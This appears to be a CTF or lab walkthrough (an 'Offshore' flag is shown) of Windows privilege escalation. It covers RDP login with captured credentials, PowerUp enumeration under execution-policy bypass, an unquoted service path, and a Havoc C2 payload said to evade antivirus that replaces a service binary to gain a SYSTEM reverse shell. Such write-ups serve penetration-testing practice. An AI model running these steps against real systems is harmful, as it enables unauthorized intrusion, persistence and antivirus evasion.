Got the creds for Domain User in another machine
└─$ proxychains xfreerdp /u:ipsec /v:172.16.1.36 /p:TryHarder.1234
No local admin rights so need to perform Privilege Escalation
If firewall is blocking you to upload anything then you need to perform manual enumeration.
Upload winpeas, powerup, powerview
cmd> powershell -executionpolicy bypass
PS> Import-Module C:\temp\powerup.ps1
PS> Invoke-AllChecks
#permission check of the folders
PS> Get-Acl
PS> Get-ChildItem | Get-Acl
Unquoted Service Path Found
https://geekmemos.com/2019/02/25/privilege-escalation/
#Command that I didn't use but is possible
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Start Havoc Client and Team server
chnage the IP in config file
cd Havoc/Client
./Havoc
cd Teamserver
sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug
#User names and the passwords are in the file for logging into the client
Setup listener and Generate payload
I used this method because the executable obtained form the havoc can bypass the real time virus monitoring
Upload
- Upload the file
- Change the name of the shell to the name of the service
- paste it in the folder and replace the old service with other name just to have a backup of that service
- Restart the system and relogin
At this stage we have a system shell in havoc client
Steps After Obataing a Reverse Shell
Flag
OFFSHORE{4t_y0ur_5erv1ce} cuckos egg